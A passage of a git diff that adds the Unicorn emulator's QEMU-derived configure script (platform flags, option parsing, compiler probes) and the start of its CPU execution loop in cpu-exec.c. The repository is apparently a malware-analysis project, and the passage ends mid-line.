bsd="yes" + make="${MAKE-gmake}" + # needed for kinfo_getvmmap(3) in libutil.h + LIBS="-lutil $LIBS" +;; +DragonFly) + bsd="yes" + make="${MAKE-gmake}" +;; +NetBSD) + bsd="yes" + make="${MAKE-gmake}" +;; +OpenBSD) + bsd="yes" + make="${MAKE-gmake}" +;; +Darwin) + bsd="yes" + darwin="yes" + LDFLAGS_SHARED="-bundle -undefined dynamic_lookup" + if [ "$cpu" = "x86_64" ] ; then + QEMU_CFLAGS="-arch x86_64 $QEMU_CFLAGS" + LDFLAGS="-arch x86_64 $LDFLAGS" + fi + # Disable attempts to use ObjectiveC features in os/object.h since they + # won't work when we're compiling with gcc as a C compiler. + QEMU_CFLAGS="-DOS_OBJECT_USE_OBJC=0 $QEMU_CFLAGS" +;; +SunOS) + solaris="yes" + make="${MAKE-gmake}" + ld="gld" + needs_libsunmath="no" + solarisrev=`uname -r | cut -f2 -d.` + if [ "$cpu" = "i386" -o "$cpu" = "x86_64" ] ; then + if test "$solarisrev" -le 9 ; then + if test -f /opt/SUNWspro/prod/lib/libsunmath.so.1; then + needs_libsunmath="yes" + QEMU_CFLAGS="-I/opt/SUNWspro/prod/include/cc $QEMU_CFLAGS" + LDFLAGS="-L/opt/SUNWspro/prod/lib -R/opt/SUNWspro/prod/lib $LDFLAGS" + LIBS="-lsunmath $LIBS" + else + error_exit "QEMU will not link correctly on Solaris 8/X86 or 9/x86 without" \ + "libsunmath from the Sun Studio compilers tools, due to a lack of" \ + "C99 math features in libm.so in Solaris 8/x86 and Solaris 9/x86" \ + "Studio 11 can be downloaded from www.sun.com." + fi + fi + fi +# needed for CMSG_ macros in sys/socket.h + QEMU_CFLAGS="-D_XOPEN_SOURCE=600 $QEMU_CFLAGS" +# needed for TIOCWIN* defines in termios.h + QEMU_CFLAGS="-D__EXTENSIONS__ $QEMU_CFLAGS" + QEMU_CFLAGS="-std=gnu99 $QEMU_CFLAGS" + solarisnetlibs="-lsocket -lnsl -lresolv" + LIBS="$solarisnetlibs $LIBS" +;; +AIX) + aix="yes" + make="${MAKE-gmake}" +;; +Haiku) + haiku="yes" + QEMU_CFLAGS="-DB_USE_POSITIVE_POSIX_ERRORS $QEMU_CFLAGS" + LIBS="-lposix_error_mapper -lnetwork $LIBS" +;; +*) + linux="yes" +;; +esac + +: ${make=${MAKE-make}} + +# Default objcc to clang if available, otherwise use CC +if has clang; then + objcc=clang +else + objcc="$cc" +fi + +if test "$mingw32" = "yes" ; then + EXESUF=".exe" + DSOSUF=".dll" + QEMU_CFLAGS="-DWIN32_LEAN_AND_MEAN -DWINVER=0x501 $QEMU_CFLAGS" + # enable C99/POSIX format strings (needs mingw32-runtime 3.15 or later) + QEMU_CFLAGS="-D__USE_MINGW_ANSI_STDIO=1 $QEMU_CFLAGS" + LIBS="-lwinmm -lws2_32 -liphlpapi $LIBS" +cat > $TMPC << EOF +int main(void) { return 0; } +EOF + if compile_prog "" "-liberty" ; then + LIBS="-liberty $LIBS" + fi +fi + +werror="" + +for opt do + optarg=`expr "x$opt" : 'x[^=]*=\(.*\)'` + case "$opt" in + --help|-h) show_help=yes + ;; + --version|-V) exec cat $source_path/VERSION + ;; + --source-path=*) + ;; + --cc=*) + ;; + --host-cc=*) host_cc="$optarg" + ;; + --objcc=*) objcc="$optarg" + ;; + --make=*) make="$optarg" + ;; + --extra-cflags=*) + ;; + --extra-ldflags=*) + ;; + --enable-debug-info) + ;; + --disable-debug-info) + ;; + --cpu=*) + ;; + --target-list=*) target_list="$optarg" + ;; + --static) + static="yes" + LDFLAGS="-static $LDFLAGS" + ;; + --enable-debug-tcg) debug_tcg="yes" + ;; + --disable-debug-tcg) debug_tcg="no" + ;; + --enable-debug) + # Enable debugging options that aren't excessively noisy + debug_tcg="yes" + debug="yes" + strip_opt="no" + ;; + --disable-strip) strip_opt="no" + ;; + --enable-pie) pie="yes" + ;; + --disable-pie) pie="no" + ;; + --enable-werror) werror="yes" + ;; + --disable-werror) werror="no" + ;; + --enable-stack-protector) stack_protector="yes" + ;; + --disable-stack-protector) stack_protector="no" + ;; + *) + echo "ERROR: unknown option $opt" + echo "Try '$0 --help' for more information" + exit 1 + ;; + esac +done + +case "$cpu" in + ppc) + CPU_CFLAGS="-m32" + LDFLAGS="-m32 $LDFLAGS" + ;; + ppc64) + CPU_CFLAGS="-m64" + LDFLAGS="-m64 $LDFLAGS" + ;; + sparc) + LDFLAGS="-m32 $LDFLAGS" + CPU_CFLAGS="-m32 -mcpu=ultrasparc" + ;; + sparc64) + LDFLAGS="-m64 $LDFLAGS" + CPU_CFLAGS="-m64 -mcpu=ultrasparc" + ;; + s390) + CPU_CFLAGS="-m31" + LDFLAGS="-m31 $LDFLAGS" + ;; + s390x) + CPU_CFLAGS="-m64" + LDFLAGS="-m64 $LDFLAGS" + ;; + i386) + CPU_CFLAGS="-m32" + LDFLAGS="-m32 $LDFLAGS" + cc_i386='$(CC) -m32' + ;; + x86_64) + CPU_CFLAGS="-m64" + LDFLAGS="-m64 $LDFLAGS" + cc_i386='$(CC) -m32' + ;; + x32) + CPU_CFLAGS="-mx32" + LDFLAGS="-mx32 $LDFLAGS" + cc_i386='$(CC) -m32' + ;; + # No special flags required for other host CPUs +esac + +QEMU_CFLAGS="$CPU_CFLAGS $QEMU_CFLAGS" +EXTRA_CFLAGS="$CPU_CFLAGS $EXTRA_CFLAGS" + +default_target_list="" + +mak_wilds="" + +if [ "$softmmu" = "yes" ]; then + mak_wilds="${mak_wilds} $source_path/default-configs/*-softmmu.mak" +fi + +for config in $mak_wilds; do + default_target_list="${default_target_list} $(basename "$config" .mak)" +done + +if test x"$show_help" = x"yes" ; then +cat << EOF + +Usage: configure [options] +Options: [defaults in brackets after descriptions] + +Standard options: + --help print this message + --target-list=LIST set target list (default: build everything) +$(echo Available targets: $default_target_list | \ + fold -s -w 53 | sed -e 's/^/ /') + +Advanced options (experts only): + --source-path=PATH path of source code [$source_path] + --cc=CC use C compiler CC [$cc] + --host-cc=CC use C compiler CC [$host_cc] for code run at + build time + --objcc=OBJCC use Objective-C compiler OBJCC [$objcc] + --extra-cflags=CFLAGS append extra C compiler flags QEMU_CFLAGS + --extra-ldflags=LDFLAGS append extra linker flags LDFLAGS + --make=MAKE use specified make [$make] + --static enable static build [$static] + --enable-debug-tcg enable TCG debugging + --disable-debug-tcg disable TCG debugging (default) + --enable-debug-info enable debugging information (default) + --disable-debug-info disable debugging information + --enable-debug enable common debug build options + --disable-strip disable stripping binaries + --disable-werror disable compilation abort on warning + --disable-stack-protector disable compiler-provided stack protection + --enable-pie build Position Independent Executables + --disable-pie do not build Position Independent Executables + --cpu=CPU Build for host CPU [$cpu] + +NOTE: The object files are built at the place where configure is launched +EOF +exit 0 +fi + +# Consult white-list to determine whether to enable werror +# by default. Only enable by default for git builds +z_version=`cut -f3 -d. $source_path/VERSION` + +if test -z "$werror" ; then + if test -d "$source_path/.git" -a \ + "$linux" = "yes" ; then + werror="yes" + else + werror="no" + fi +fi + +# check that the C compiler works. +cat > $TMPC <<EOF +int main(void) { return 0; } +EOF + +if compile_object ; then + : C compiler works ok +else + error_exit "\"$cc\" either does not exist or does not work" +fi + +gcc_flags="-Wold-style-declaration -Wold-style-definition -Wtype-limits" +gcc_flags="-Wformat-security -Wformat-y2k -Winit-self -Wignored-qualifiers $gcc_flags" +gcc_flags="-Wmissing-include-dirs -Wempty-body -Wnested-externs $gcc_flags" +gcc_flags="-Wendif-labels $gcc_flags" +gcc_flags="-Wno-initializer-overrides $gcc_flags" +gcc_flags="-Wno-string-plus-int $gcc_flags" +# Note that we do not add -Werror to gcc_flags here, because that would +# enable it for all configure tests. If a configure test failed due +# to -Werror this would just silently disable some features, +# so it's too error prone. +cat > $TMPC << EOF +int main(void) { return 0; } +EOF +for flag in $gcc_flags; do + # Use the positive sense of the flag when testing for -Wno-wombat + # support (gcc will happily accept the -Wno- form of unknown + # warning options). + optflag="$(echo $flag | sed -e 's/^-Wno-/-W/')" + if compile_prog "-Werror $optflag" "" ; then + QEMU_CFLAGS="$QEMU_CFLAGS $flag" + fi +done + +if test "$stack_protector" != "no"; then + gcc_flags="-fstack-protector-strong -fstack-protector-all" + sp_on=0 + for flag in $gcc_flags; do + # We need to check both a compile and a link, since some compiler + # setups fail only on a .c->.o compile and some only at link time + if do_cc $QEMU_CFLAGS -Werror $flag -c -o $TMPO $TMPC && + compile_prog "-Werror $flag" ""; then + QEMU_CFLAGS="$QEMU_CFLAGS $flag" + sp_on=1 + break + fi + done + if test "$stack_protector" = yes; then + if test $sp_on = 0; then + error_exit "Stack protector not supported" + fi + fi +fi + +# Workaround for http://gcc.gnu.org/PR55489. Happens with -fPIE/-fPIC and +# large functions that use global variables. The bug is in all releases of +# GCC, but it became particularly acute in 4.6.x and 4.7.x. It is fixed in +# 4.7.3 and 4.8.0. We should be able to delete this at the end of 2013. +cat > $TMPC << EOF +#if __GNUC__ == 4 && (__GNUC_MINOR__ == 6 || (__GNUC_MINOR__ == 7 && __GNUC_PATCHLEVEL__ <= 2)) +int main(void) { return 0; } +#else +#error No bug in this compiler. +#endif +EOF +if compile_prog "-Werror -fno-gcse" "" ; then + TRANSLATE_OPT_CFLAGS=-fno-gcse +fi + +if test "$static" = "yes" ; then + if test "$pie" = "yes" ; then + error_exit "static and pie are mutually incompatible" + else + pie="no" + fi +fi + +if test "$pie" = ""; then + case "$cpu-$targetos" in + i386-Linux|x86_64-Linux|x32-Linux|i386-OpenBSD|x86_64-OpenBSD) + ;; + *) + pie="no" + ;; + esac +fi + +if test "$pie" != "no" ; then + cat > $TMPC << EOF + +#ifdef __linux__ +# define THREAD __thread +#else +# define THREAD +#endif + +static THREAD int tls_var; + +int main(void) { return tls_var; } + +EOF + if compile_prog "-fPIE -DPIE" "-pie"; then + QEMU_CFLAGS="-fPIE -DPIE $QEMU_CFLAGS" + LDFLAGS="-pie $LDFLAGS" + pie="yes" + if compile_prog "" "-Wl,-z,relro -Wl,-z,now" ; then + LDFLAGS="-Wl,-z,relro -Wl,-z,now $LDFLAGS" + fi + else + if test "$pie" = "yes"; then + error_exit "PIE not available due to missing toolchain support" + else + echo "Disabling PIE due to missing toolchain support" + pie="no" + fi + fi + + if compile_prog "-fno-pie" "-nopie"; then + CFLAGS_NOPIE="-fno-pie" + LDFLAGS_NOPIE="-nopie" + fi +fi + +########################################## +# __sync_fetch_and_and requires at least -march=i486. Many toolchains +# use i686 as default anyway, but for those that don't, an explicit +# specification is necessary + +if test "$cpu" = "i386"; then + cat > $TMPC << EOF +static int sfaa(int *ptr) +{ + return __sync_fetch_and_and(ptr, 0); +} + +int main(void) +{ + int val = 42; + val = __sync_val_compare_and_swap(&val, 0, 1); + sfaa(&val); + return val; +} +EOF + if ! compile_prog "" "" ; then + QEMU_CFLAGS="-march=i486 $QEMU_CFLAGS" + fi +fi + +######################################### +# Solaris specific configure tool chain decisions + +if test "$solaris" = "yes" ; then + if has ar; then + : + else + if test -f /usr/ccs/bin/ar ; then + error_exit "No path includes ar" \ + "Add /usr/ccs/bin to your path and rerun configure" + fi + error_exit "No path includes ar" + fi +fi + +if test -z "${target_list+xxx}" ; then + target_list="$default_target_list" +else + target_list=`echo "$target_list" | sed -e 's/,/ /g'` +fi + +# Check that we recognised the target name; this allows a more +# friendly error message than if we let it fall through. +for target in $target_list; do + case " $default_target_list " in + *" $target "*) + ;; + *) + error_exit "Unknown target name '$target'" + ;; + esac +done + +# see if system emulation was really requested +case " $target_list " in + *"-softmmu "*) softmmu=yes + ;; + *) softmmu=no + ;; +esac + +feature_not_found() { + feature=$1 + remedy=$2 + + error_exit "User requested feature $feature" \ + "configure was not able to find it." \ + "$remedy" +} + +# --- +# big/little endian test +cat > $TMPC << EOF +short big_endian[] = { 0x4269, 0x4765, 0x4e64, 0x4961, 0x4e00, 0, }; +short little_endian[] = { 0x694c, 0x7454, 0x654c, 0x6e45, 0x6944, 0x6e41, 0, }; +extern int foo(short *, short *); +int main(int argc, char *argv[]) { + return foo(big_endian, little_endian); +} +EOF + +if compile_object ; then + if grep -q BiGeNdIaN $TMPO ; then + bigendian="yes" + elif grep -q LiTtLeEnDiAn $TMPO ; then + bigendian="no" + else + echo big/little test failed + fi +else + echo big/little test failed +fi + +########################################## +# pthread probe +PTHREADLIBS_LIST="-pthread -lpthread -lpthreadGC2" + +pthread=no +cat > $TMPC << EOF +#include <pthread.h> +static void *f(void *p) { return NULL; } +int main(void) { + pthread_t thread; + pthread_create(&thread, 0, f, 0); + return 0; +} +EOF +if compile_prog "" "" ; then + pthread=yes +else + for pthread_lib in $PTHREADLIBS_LIST; do + if compile_prog "" "$pthread_lib" ; then + pthread=yes + found=no + for lib_entry in $LIBS; do + if test "$lib_entry" = "$pthread_lib"; then + found=yes + break + fi + done + if test "$found" = "no"; then + LIBS="$pthread_lib $LIBS" + fi + break + fi + done +fi + +if test "$mingw32" != yes -a "$pthread" = no; then + error_exit "pthread check failed" \ + "Make sure to have the pthread libs and headers installed." +fi + +# Search for bswap_32 function +byteswap_h=no +cat > $TMPC << EOF +#include <byteswap.h> +int main(void) { return bswap_32(0); } +EOF +if compile_prog "" "" ; then + byteswap_h=yes +fi + +# Search for bswap32 function +bswap_h=no +cat > $TMPC << EOF +#include <sys/endian.h> +#include <sys/types.h> +#include <machine/bswap.h> +int main(void) { return bswap32(0); } +EOF +if compile_prog "" "" ; then + bswap_h=yes +fi + +########################################## +# Do we need libm +cat > $TMPC << EOF +#include <math.h> +int main(int argc, char **argv) { return isnan(sin((double)argc)); } +EOF +if compile_prog "" "" ; then + : +elif compile_prog "" "-lm" ; then + LIBS="-lm $LIBS" +else + error_exit "libm check failed" +fi + +########################################## +# Do we need librt +# uClibc provides 2 versions of clock_gettime(), one with realtime +# support and one without. This means that the clock_gettime() don't +# need -lrt. We still need it for timer_create() so we check for this +# function in addition. +cat > $TMPC <<EOF +#include <signal.h> +#include <time.h> +int main(void) { + timer_create(CLOCK_REALTIME, NULL, NULL); + return clock_gettime(CLOCK_REALTIME, NULL); +} +EOF + +if compile_prog "" "" ; then + : +# we need pthread for static linking. use previous pthread test result +elif compile_prog "" "$pthread_lib -lrt" ; then + LIBS="$LIBS -lrt" +fi + +######################################## +# check if we have valgrind/valgrind.h + +valgrind_h=no +cat > $TMPC << EOF +#include <valgrind/valgrind.h> +int main(void) { + return 0; +} +EOF +if compile_prog "" "" ; then + valgrind_h=yes +fi + +######################################## +# check if cpuid.h is usable. + +cpuid_h=no +cat > $TMPC << EOF +#include <cpuid.h> +int main(void) { + unsigned a, b, c, d; + int max = __get_cpuid_max(0, 0); + + if (max >= 1) { + __cpuid(1, a, b, c, d); + } + + if (max >= 7) { + __cpuid_count(7, 0, a, b, c, d); + } + + return 0; +} +EOF +if compile_prog "" "" ; then + cpuid_h=yes +fi + +######################################## +# check if __[u]int128_t is usable. + +int128=no +cat > $TMPC << EOF +#if defined(__clang_major__) && defined(__clang_minor__) +# if ((__clang_major__ < 3) || (__clang_major__ == 3) && (__clang_minor__ < 2)) +# error __int128_t does not work in CLANG before 3.2 +# endif +#endif +__int128_t a; +__uint128_t b; +int main (void) { + a = a + b; + b = a * b; + a = a * a; + return 0; +} +EOF +if compile_prog "" "" ; then + int128=yes +fi + +# Now we've finished running tests it's OK to add -Werror to the compiler flags +if test "$werror" = "yes"; then + QEMU_CFLAGS="-Werror $QEMU_CFLAGS" +fi + +if test "$solaris" = "no" ; then + if $ld --version 2>/dev/null | grep "GNU ld" >/dev/null 2>/dev/null ; then + LDFLAGS="-Wl,--warn-common $LDFLAGS" + fi +fi + +# Use ASLR, no-SEH and DEP if available +if test "$mingw32" = "yes" ; then + for flag in --dynamicbase --no-seh --nxcompat; do + if $ld --help 2>/dev/null | grep ".$flag" >/dev/null 2>/dev/null ; then + LDFLAGS="-Wl,$flag $LDFLAGS" + fi + done +fi + +echo "Source path $source_path" +echo "C compiler $cc" +echo "Host C compiler $host_cc" +echo "Objective-C compiler $objcc" +echo "ARFLAGS $ARFLAGS" +echo "CFLAGS $CFLAGS" +echo "QEMU_CFLAGS $QEMU_CFLAGS" +echo "LDFLAGS $LDFLAGS" +echo "make $make" +echo "host CPU $cpu" +echo "host big endian $bigendian" +echo "target list $target_list" +echo "tcg debug enabled $debug_tcg" +echo "strip binaries $strip_opt" +echo "static build $static" +echo "mingw32 support $mingw32" +if test -n "$sparc_cpu"; then + echo "Target Sparc Arch $sparc_cpu" +fi +echo "PIE $pie" + +config_host_mak="config-host.mak" + +echo "# Automatically generated by configure - do not modify" > $config_host_mak +echo >> $config_host_mak + +echo all: >> $config_host_mak +echo "extra_cflags=$EXTRA_CFLAGS" >> $config_host_mak +echo "extra_ldflags=$EXTRA_LDFLAGS" >> $config_host_mak + +echo "ARCH=$ARCH" >> $config_host_mak + +if test "$debug_tcg" = "yes" ; then + echo "CONFIG_DEBUG_TCG=y" >> $config_host_mak +fi +if test "$strip_opt" = "yes" ; then + echo "STRIP=${strip}" >> $config_host_mak +fi +if test "$bigendian" = "yes" ; then + echo "HOST_WORDS_BIGENDIAN=y" >> $config_host_mak +fi +if test "$mingw32" = "yes" ; then + echo "CONFIG_WIN32=y" >> $config_host_mak + rc_version=`cat $source_path/VERSION` + version_major=${rc_version%%.*} + rc_version=${rc_version#*.} + version_minor=${rc_version%%.*} + rc_version=${rc_version#*.} + version_subminor=${rc_version%%.*} + version_micro=0 + echo "CONFIG_FILEVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak + echo "CONFIG_PRODUCTVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak +else + echo "CONFIG_POSIX=y" >> $config_host_mak +fi + +if test "$linux" = "yes" ; then + echo "CONFIG_LINUX=y" >> $config_host_mak +fi + +if test "$solaris" = "yes" ; then + echo "CONFIG_SOLARIS=y" >> $config_host_mak + echo "CONFIG_SOLARIS_VERSION=$solarisrev" >> $config_host_mak + if test "$needs_libsunmath" = "yes" ; then + echo "CONFIG_NEEDS_LIBSUNMATH=y" >> $config_host_mak + fi +fi +if test "$static" = "yes" ; then + echo "CONFIG_STATIC=y" >> $config_host_mak +fi +echo "SRC_PATH=$source_path" >> $config_host_mak +echo "TARGET_DIRS=$target_list" >> $config_host_mak +if test "$byteswap_h" = "yes" ; then + echo "CONFIG_BYTESWAP_H=y" >> $config_host_mak +fi +if test "$bswap_h" = "yes" ; then + echo "CONFIG_MACHINE_BSWAP_H=y" >> $config_host_mak +fi + +# XXX: suppress that +if [ "$bsd" = "yes" ] ; then + echo "CONFIG_BSD=y" >> $config_host_mak +fi + +if test "$valgrind_h" = "yes" ; then + echo "CONFIG_VALGRIND_H=y" >> $config_host_mak +fi + +if test "$cpuid_h" = "yes" ; then + echo "CONFIG_CPUID_H=y" >> $config_host_mak +fi + +if test "$int128" = "yes" ; then + echo "CONFIG_INT128=y" >> $config_host_mak +fi + +if test "$ARCH" = "sparc64" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/sparc $QEMU_INCLUDES" +elif test "$ARCH" = "s390x" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/s390 $QEMU_INCLUDES" +elif test "$ARCH" = "x86_64" -o "$ARCH" = "x32" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/i386 $QEMU_INCLUDES" +elif test "$ARCH" = "ppc64" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/ppc $QEMU_INCLUDES" +else + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/\$(ARCH) $QEMU_INCLUDES" +fi +QEMU_INCLUDES="-I\$(SRC_PATH)/tcg $QEMU_INCLUDES" + +echo "MAKE=$make" >> $config_host_mak +echo "CC=$cc" >> $config_host_mak +echo "CC_I386=$cc_i386" >> $config_host_mak +echo "HOST_CC=$host_cc" >> $config_host_mak +echo "OBJCC=$objcc" >> $config_host_mak +echo "AR=$ar" >> $config_host_mak +echo "ARFLAGS=$ARFLAGS" >> $config_host_mak +echo "AS=$as" >> $config_host_mak +echo "CPP=$cpp" >> $config_host_mak +echo "OBJCOPY=$objcopy" >> $config_host_mak +echo "LD=$ld" >> $config_host_mak +echo "NM=$nm" >> $config_host_mak +echo "CFLAGS=$CFLAGS" >> $config_host_mak +echo "CFLAGS_NOPIE=$CFLAGS_NOPIE" >> $config_host_mak +echo "QEMU_CFLAGS=$QEMU_CFLAGS" >> $config_host_mak +echo "QEMU_INCLUDES=$QEMU_INCLUDES" >> $config_host_mak +echo "LDFLAGS=$LDFLAGS" >> $config_host_mak +echo "LDFLAGS_NOPIE=$LDFLAGS_NOPIE" >> $config_host_mak +echo "LIBS+=$LIBS" >> $config_host_mak +echo "EXESUF=$EXESUF" >> $config_host_mak +echo "DSOSUF=$DSOSUF" >> $config_host_mak +echo "LDFLAGS_SHARED=$LDFLAGS_SHARED" >> $config_host_mak +echo "TRANSLATE_OPT_CFLAGS=$TRANSLATE_OPT_CFLAGS" >> $config_host_mak + +for target in $target_list; do +target_dir="$target" +config_target_mak=$target_dir/config-target.mak +target_name=`echo $target | cut -d '-' -f 1` +target_bigendian="no" + +case "$target_name" in + aarch64eb|armeb|lm32|m68k|microblaze|mips|mipsn32|mips64|moxie|or32|ppc|ppcemb|ppc64|ppc64abi32|s390x|sh4eb|sparc|sparc64|sparc32plus|xtensaeb) + target_bigendian=yes + ;; +esac +target_softmmu="yes" +case "$target" in + ${target_name}-softmmu) + target_softmmu="yes" + ;; + *) + error_exit "Target '$target' not recognised" + exit 1 + ;; +esac + +mkdir -p $target_dir +echo "# Automatically generated by configure - do not modify" > $config_target_mak + +bflt="no" + +TARGET_ARCH="$target_name" +TARGET_BASE_ARCH="" + +case "$target_name" in + i386) + ;; + x86_64) + TARGET_BASE_ARCH=i386 + ;; + alpha) + ;; + arm|armeb) + TARGET_ARCH=arm + bflt="yes" + ;; + aarch64|aarch64eb) + TARGET_BASE_ARCH=arm + TARGET_ARCH=aarch64 + bflt="yes" + ;; + cris) + ;; + lm32) + ;; + m68k) + bflt="yes" + ;; + microblaze|microblazeel) + TARGET_ARCH=microblaze + bflt="yes" + ;; + mips|mipsel) + TARGET_ARCH=mips + echo "TARGET_ABI_MIPSO32=y" >> $config_target_mak + ;; + mipsn32|mipsn32el) + TARGET_ARCH=mips64 + TARGET_BASE_ARCH=mips + echo "TARGET_ABI_MIPSN32=y" >> $config_target_mak + echo "TARGET_ABI32=y" >> $config_target_mak + ;; + mips64|mips64el) + TARGET_ARCH=mips64 + TARGET_BASE_ARCH=mips + echo "TARGET_ABI_MIPSN64=y" >> $config_target_mak + ;; + tricore) + ;; + moxie) + ;; + or32) + TARGET_ARCH=openrisc + TARGET_BASE_ARCH=openrisc + ;; + ppc) + ;; + ppcemb) + TARGET_BASE_ARCH=ppc + ;; + ppc64) + TARGET_BASE_ARCH=ppc + ;; + ppc64le) + TARGET_ARCH=ppc64 + TARGET_BASE_ARCH=ppc + ;; + ppc64abi32) + TARGET_ARCH=ppc64 + TARGET_BASE_ARCH=ppc + echo "TARGET_ABI32=y" >> $config_target_mak + ;; + sh4|sh4eb) + TARGET_ARCH=sh4 + bflt="yes" + ;; + sparc) + ;; + sparc64) + TARGET_BASE_ARCH=sparc + ;; + sparc32plus) + TARGET_ARCH=sparc64 + TARGET_BASE_ARCH=sparc + echo "TARGET_ABI32=y" >> $config_target_mak + ;; + s390x) + ;; + unicore32) + ;; + xtensa|xtensaeb) + TARGET_ARCH=xtensa + ;; + *) + error_exit "Unsupported target CPU" + ;; +esac +# TARGET_BASE_ARCH needs to be defined after TARGET_ARCH +if [ "$TARGET_BASE_ARCH" = "" ]; then + TARGET_BASE_ARCH=$TARGET_ARCH +fi + +symlink "$source_path/Makefile.target" "$target_dir/Makefile" + +upper() { + echo "$@"| LC_ALL=C tr '[a-z]' '[A-Z]' +} + +target_arch_name="`upper $TARGET_ARCH`" +echo "TARGET_$target_arch_name=y" >> $config_target_mak +echo "TARGET_NAME=$target_name" >> $config_target_mak +echo "TARGET_BASE_ARCH=$TARGET_BASE_ARCH" >> $config_target_mak +if test "$target_bigendian" = "yes" ; then + echo "TARGET_WORDS_BIGENDIAN=y" >> $config_target_mak +fi +if test "$target_softmmu" = "yes" ; then + echo "CONFIG_SOFTMMU=y" >> $config_target_mak +fi + +# generate QEMU_CFLAGS/LDFLAGS for targets + +cflags="" +ldflags="" + +case "$ARCH" in +alpha) + # Ensure there's only a single GP + cflags="-msmall-data $cflags" +;; +esac + +echo "LDFLAGS+=$ldflags" >> $config_target_mak +echo "QEMU_CFLAGS+=$cflags" >> $config_target_mak +echo "QEMU_CFLAGS+=-include ${target_name}.h" >> $config_target_mak + +done # for target in $targets + +# Save the configure command line for later reuse. +cat <<EOD >config.status +#!/bin/sh +# Generated by configure. +# Run this file to recreate the current configuration. +# Compiler output produced by configure, useful for debugging +# configure, is in config.log if it exists. +EOD +printf "exec" >>config.status +printf " '%s'" "$0" "$@" >>config.status +echo >>config.status +chmod +x config.status + +rm -r "$TMPDIR1" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/cpu-exec.c b/ai_anti_malware/unicorn/unicorn-master/qemu/cpu-exec.c new file mode 100644 index 0000000..b4aa4bf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/cpu-exec.c @@ -0,0 +1,449 @@ +/* + * emulator main execution loop + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "tcg.h" +#include "sysemu/sysemu.h" + +#include "uc_priv.h" + +static tcg_target_ulong cpu_tb_exec(CPUState *cpu, uint8_t *tb_ptr); +static TranslationBlock *tb_find_slow(CPUArchState *env, target_ulong pc, + target_ulong cs_base, uint64_t flags); +static TranslationBlock *tb_find_fast(CPUArchState *env); +static void cpu_handle_debug_exception(CPUArchState *env); + +void cpu_loop_exit(CPUState *cpu) +{ + cpu->current_tb = NULL; + siglongjmp(cpu->jmp_env, 1); +} + +/* exit the current TB from a signal handler. The host registers are + restored in a state compatible with the CPU emulator + */ +void cpu_resume_from_signal(CPUState *cpu, void *puc) +{ + /* XXX: restore cpu registers saved in host registers */ + cpu->exception_index = -1; + siglongjmp(cpu->jmp_env, 1); +} + +/* main execution loop */ + +int cpu_exec(struct uc_struct *uc, CPUArchState *env) // qq +{ + CPUState *cpu = ENV_GET_CPU(env); + TCGContext *tcg_ctx = env->uc->tcg_ctx; + CPUClass *cc = CPU_GET_CLASS(uc, cpu); +#ifdef TARGET_I386 + X86CPU *x86_cpu = X86_CPU(uc, cpu); +#endif + int ret = 0, interrupt_request; + TranslationBlock *tb; + uint8_t *tc_ptr; + uintptr_t next_tb; + struct hook *hook; + + if (cpu->halted) { + if (!cpu_has_work(cpu)) { + return EXCP_HALTED; + } + + cpu->halted = 0; + } + + uc->current_cpu = cpu; + + /* As long as current_cpu is null, up to the assignment just above, + * requests by other threads to exit the execution loop are expected to + * be issued using the exit_request global. We must make sure that our + * evaluation of the global value is performed past the current_cpu + * value transition point, which requires a memory barrier as well as + * an instruction scheduling constraint on modern architectures. */ + smp_mb(); + + if (unlikely(uc->exit_request)) { + cpu->exit_request = 1; + } + + cc->cpu_exec_enter(cpu); + cpu->exception_index = -1; + env->invalid_error = UC_ERR_OK; + + /* prepare setjmp context for exception handling */ + for(;;) { + if (sigsetjmp(cpu->jmp_env, 0) == 0) { + if (uc->stop_request || uc->invalid_error) { + break; + } + + /* if an exception is pending, we execute it here */ + if (cpu->exception_index >= 0) { + //printf(">>> GOT INTERRUPT. exception idx = %x\n", cpu->exception_index); // qq + if (cpu->exception_index >= EXCP_INTERRUPT) { + /* exit request from the cpu execution loop */ + ret = cpu->exception_index; + if (ret == EXCP_DEBUG) { + cpu_handle_debug_exception(env); + } + break; + } else { + bool catched = false; +#if defined(CONFIG_USER_ONLY) + /* if user mode only, we simulate a fake exception + which will be handled outside the cpu execution + loop */ +#if defined(TARGET_I386) + cc->do_interrupt(cpu); +#endif + ret = cpu->exception_index; + break; +#else +#if defined(TARGET_X86_64) + if (env->exception_is_int) { + // point EIP to the next instruction after INT + env->eip = env->exception_next_eip; + } +#endif +#if defined(TARGET_MIPS) || defined(TARGET_MIPS64) + env->active_tc.PC = uc->next_pc; +#endif + if (uc->stop_interrupt && uc->stop_interrupt(cpu->exception_index)) { + // Unicorn: call registered invalid instruction callbacks + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN_INVALID) { + if (hook->to_delete) + continue; + catched = ((uc_cb_hookinsn_invalid_t)hook->callback)(uc, hook->user_data); + if (catched) + break; + } + if (!catched) + uc->invalid_error = UC_ERR_INSN_INVALID; + } else { + // Unicorn: call registered interrupt callbacks + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INTR) { + if (hook->to_delete) + continue; + ((uc_cb_hookintr_t)hook->callback)(uc, cpu->exception_index, hook->user_data); + catched = true; + } + if (!catched) + uc->invalid_error = UC_ERR_EXCEPTION; + } + + // Unicorn: If un-catched interrupt, stop executions. + if (!catched) { + cpu->halted = 1; + ret = EXCP_HLT; + break; + } + + cpu->exception_index = -1; +#endif + } + } + + next_tb = 0; /* force lookup of first TB */ + for(;;) { + interrupt_request = 